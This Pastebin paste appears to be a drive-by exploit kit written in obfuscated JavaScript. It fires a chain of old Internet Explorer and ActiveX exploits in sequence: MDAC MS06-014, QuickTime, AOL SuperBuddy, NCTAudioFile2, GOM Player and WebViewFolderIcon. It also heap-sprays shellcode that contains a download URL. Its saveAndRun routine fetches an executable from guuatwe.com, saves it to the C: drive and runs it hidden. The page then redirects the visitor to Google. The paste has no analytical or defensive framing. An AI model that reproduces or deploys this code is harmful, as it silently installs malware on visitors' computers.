Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function getRandomString(len)
- {
- var chars = "abcdefghiklmnopqrstuvwxyz";
- var string_length = len;
- var randomstring = '';
- for (var i = 0; i < string_length; i++) {
- var rnum = Math.floor(Math.random() * chars.length);
- randomstring += chars.substring(rnum, rnum + 1);
- }
- return randomstring;
- }
- function CreateObj(CLSID, name) {
- var r = null;
- try {
- eval('r = CLSID.CreateObject(name)')
- } catch (e) {}
- if (!r) {
- try {
- eval('r = CLSID.CreateObject(name, "")')
- } catch (e) {}
- }
- if (!r) {
- try {
- eval('r = CLSID.CreateObject(name, "", "")')
- } catch (e) {}
- }
- if (!r) {
- try {
- eval('r = CLSID.GetObject("", name)')
- } catch (e) {}
- }
- if (!r) {
- try {
- eval('r = CLSID.GetObject(name, "")')
- } catch (e) {}
- }
- if (!r) {
- try {
- eval('r = CLSID.GetObject(name)')
- } catch (e) {}
- }
- return (r);
- }
- function PUQoa75u(xml, url) {
- try {
- xml.open("GET", url, false);
- xml.send(null);
- } catch (e) {
- return 0;
- }
- return xml.responseBody;
- }
- function H5pqBlLZ(o, name, data) {
- try {
- o.Type = 1;
- o.Mode = 3;
- o.Open();
- o.Write(data);
- o.SaveToFile(name, 2);
- o.Close();
- } catch (e) {
- return 0;
- }
- return 1;
- }
- function saveAndRun(url, msxml, adobd, shell, flg)
- {
- var retval = 0;
- var data = PUQoa75u(msxml, url);
- if (data != 0) {
- var name = "c:\\win" + getRandomString(4) + ".exe";
- if (H5pqBlLZ(adobd, name, data) == 1) {
- if (flg == 0) {
- try {
- shell.Run(name, 0);
- retval = 1;
- } catch (e) {}
- } else {
- try {
- shell.ShellExecute(name, "", "", "open", 0);
- retval = 1;
- } catch (e) {}
- }
- }
- }
- return retval;
- }
- function n0lterOf()
- {
- //MDAC
- //MS06-014
- var SjGuPMDY = new Array(null, null, null);
- var f8SnLc6m = 0;
- var FileURL = 'http://guuatwe.com/cgi-bin/in.cgi?02010258020000000019f696fa242c146581fe980f';
- var GP_I_QqR = 1;
- try {
- var AwZtzjWT = 0;
- var MTAHFY7C = document.createElement("object");
- MTAHFY7C.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
- if (MTAHFY7C) {
- SjGuPMDY[0] = CreateObj(MTAHFY7C, "msxml2.XMLHTTP");
- if (!SjGuPMDY[0]) SjGuPMDY[0] = CreateObj(MTAHFY7C, "Microsoft.XMLHTTP");
- if (!SjGuPMDY[0]) SjGuPMDY[0] = CreateObj(MTAHFY7C, "MSXML2.ServerXMLHTTP");
- SjGuPMDY[1] = CreateObj(MTAHFY7C, "ADODB.Stream");
- SjGuPMDY[2] = CreateObj(MTAHFY7C, "WScript.Shell");
- if (!SjGuPMDY[2]) {
- SjGuPMDY[2] = CreateObj(MTAHFY7C, "Shell.Application");
- if (SjGuPMDY[2]) AwZtzjWT = 1;
- }
- }
- if (SjGuPMDY[0] && SjGuPMDY[1] && SjGuPMDY[2]) {
- for (var HanQIHas = 0; HanQIHas < GP_I_QqR; HanQIHas++) {
- var w3l9oW0c = saveAndRun(FileURL + '0' + HanQIHas.toString(), SjGuPMDY[0], SjGuPMDY[1], SjGuPMDY[2], AwZtzjWT);
- if (!f8SnLc6m)
- f8SnLc6m = w3l9oW0c;
- }
- }
- } catch (e) {}
- return f8SnLc6m;
- }
- var Cs7_PWfL = new Array();
- var a3mMODsG = 0;
- function BElrxd2U()
- {
- Cs7_PWfL = Cs7_PWfL;
- setTimeout("F0VTp03Y()", 2000); //WTF?
- }
- function MEaQ5wuE(V4VFVTqg, ZKviSpUh)
- {
- while (V4VFVTqg.length * 2 < ZKviSpUh)
- V4VFVTqg += V4VFVTqg;
- V4VFVTqg = V4VFVTqg.substring(0, ZKviSpUh / 2);
- return V4VFVTqg;
- }
- function DnCWiFOj()
- {
- //Shellcode
- //Use http://sandsprite.com/shellcode_2_exe.php
- if (!a3mMODsG) {
- var MbpsSXDL = 0x0c0c0c0c;
- var shellcode = unescape("%uf633%u09e9%u0001%u5f00%uc033%u0364%u3040%u0c78" +
- "%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u408b%u8d34" +
- "%u7c40%u688b%u8b3c%u6af7%u5903%u9ce8%u0000%ue200" +
- "%u68f9%u6e6f%u0000%u7568%u6c72%u546d%u16ff%ue88b" +
- "%u86e8%u0000%u6800%u3233%u0000%u7568%u6573%u5472" +
- "%u16ff%ue88b%u026a%ue859%u006f%u0000%uf9e2%uec83" +
- "%u8b20%uc7dc%u6303%u5c3a%uc769%u0443%u666e%u2e6f" +
- "%u43c7%u6508%u6578%u6a00%u6a00%u5300%u6a57%uff00" +
- "%u0c56%udc8b%u016a%uff53%u0856%u1a6a%u406a%u56ff" +
- "%u8b04%uebe8%u5f0c%u006a%u6a57%u5500%u006a%u56ff" +
- "%ue814%uffef%uffff%u8b55%u83ec%u0c7d%u750f%ube16" +
- "%u0001%u0000%u5aeb%u8b5f%u83f7%u05c6%u006a%u458b" +
- "%u5008%u56ff%u3310%u5dc0%u10c2%u5100%u8b56%u3c75" +
- "%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149" +
- "%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d" +
- "%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66" +
- "%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359" +
- "%ufe83%u7400%ue805%uff9c%uffff%ue8e8%ufffe%u8eff" +
- "%u0e4e%uecec%u0397%u980c%u8afe%u360e%u2f1a%u8370" +
- "%u5d4f%u60c9%uc308%u68bf%u7474%u3a70%u2f2f%u7567" +
- "%u6175%u7774%u2e65%u6f63%u2f6d%u6763%u2d69%u6962" +
- "%u2f6e%u6e69%u632e%u6967%u303f%u3032%u3031%u3532" +
- "%u3038%u3038%u3030%u3030%u3030%u3130%u6639%u3936" +
- "%u6636%u3261%u3234%u3163%u3634%u3835%u6631%u3965" +
- "%u3038%u0066");
- var base = 0x400000;
- var K03nKeGs = shellcode.length * 2;
- var ZKviSpUh = base - (K03nKeGs + 0x38);
- var V4VFVTqg = unescape("%u0c0c%u0c0c");
- V4VFVTqg = MEaQ5wuE(V4VFVTqg, ZKviSpUh);
- var KGyijR1o = (MbpsSXDL - 0x400000) / base;
- for (i = 0; i < KGyijR1o; i++) {
- Cs7_PWfL[i] = V4VFVTqg + shellcode;
- }
- a3mMODsG = 1;
- BElrxd2U();
- }
- return 0;
- }
- function setCookie(MsXJGK1z)
- {
- try {
- var HaD_xOyK = new Date();
- HaD_xOyK.setDate(todayDate.getDate() + 1);
- document.cookie =
- "id=" + MsXJGK1z +
- "; expires=" + HaD_xOyK.toGMTString() +
- "; path=/";
- } catch (e) {}
- }
- function SOhxTHtY() {
- //Apple QuickTime RTSP Response Header Content-Type Remote Stack Based Buffer Overflow Vulnerability
- //http://www.securityfocus.com/bid/26549/info
- //CVE-2007-6166
- var U975d39H = 0;
- var V9f7IKVO;
- for (V9f7IKVO = 4; V9f7IKVO <= 8; V9f7IKVO++) {
- try {
- var dcYpQvmM = new ActiveXObject('QuickTime.QuickTime.' + V9f7IKVO);
- if (dcYpQvmM) {
- if (V9f7IKVO == 4) U975d39H = '6';
- else U975d39H = '8';
- break;
- }
- } catch (e) {}
- }
- if (U975d39H) {
- var Xxgrl_Ht = '<object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0" style="border:0px">' +
- '<param name="src" value="?o' + U975d39H +
- '&p=2180945935&r=606868581">' +
- '<param name="autoplay" value="true">' +
- '<param name="loop" value="false">' +
- '<param name="controller" value="true">' + '</object>';
- setCookie(V9f7IKVO == 4 ? 6 : 16);
- var IhlaMIiq = document.createElement("div");
- IhlaMIiq.innerHTML = Xxgrl_Ht;
- document.body.appendChild(IhlaMIiq);
- }
- return 0;
- }
- function u5r_Qafm() {
- //AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability
- //http://www.securityfocus.com/bid/23224/info
- //CVE-2006-5820
- try {
- var tXW7yj4H = new ActiveXObject('Sb.SuperBuddy.1');
- if (tXW7yj4H) {
- setCookie(9);
- tXW7yj4H.LinkSBIcons(0x0c0c0c0c);
- }
- } catch (e) {}
- return 0;
- }
- function Fv2QJVho()
- {
- //NCTsoft NCTAudioFile2 ActiveX Control Remote Buffer Overflow Vulnerability
- //http://www.securityfocus.com/bid/22196/info
- //CVE-2007-0018
- try {
- var zLlC1ZgM = document.createElement("object");
- zLlC1ZgM.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");
- var EJqO2XHr = '';
- for (var i = 0; i < 4124; i++)
- EJqO2XHr += "\x0c";
- setCookie(3);
- zLlC1ZgM.SetFormatLikeSample(EJqO2XHr);
- } catch (e) {}
- }
- function uzbeukYW()
- {
- //http://www.securityfocus.com/bid/26236
- //Gretech GOM Player GomWeb3.DLL Remote Buffer Overflow Vulnerability
- //CVE-2007-5779
- try {
- var dj0JIo5m = new ActiveXObject("GomWebCtrl.GomManager.1");
- if (dj0JIo5m) {
- var scode = '';
- var wzMF9BEs = 510;
- for (var i = 0; i < wzMF9BEs; i++)
- scode += unescape("%0c");
- setCookie(13);
- dj0JIo5m.OpenURL(scode);
- }
- } catch (e) {}
- return 0;
- }
- function bF4sn2HS()
- {
- //Internet Explorer WebViewFolderIcon setSlice() Overflow
- //http://www.exploit-db.com/exploits/2440/
- //http://www.securityfocus.com/bid/19030
- setCookie(12);
- for (var i = 0; i < 128; i++)
- {
- try {
- var TNTSnXxZ = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
- TNTSnXxZ.setSlice(0x7ffffffe, 0x0c0c0c0c, 0x0c0c0c0c, 0x0c0c0c0c);
- } catch (e) {}
- }
- return 0;
- }
- //Run sploits
- if (n0lterOf() || DnCWiFOj() || SOhxTHtY() || u5r_Qafm() || Fv2QJVho() || uzbeukYW() || bF4sn2HS()) {}
- setTimeout("window.location = 'http://www.google.com'", 5000);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement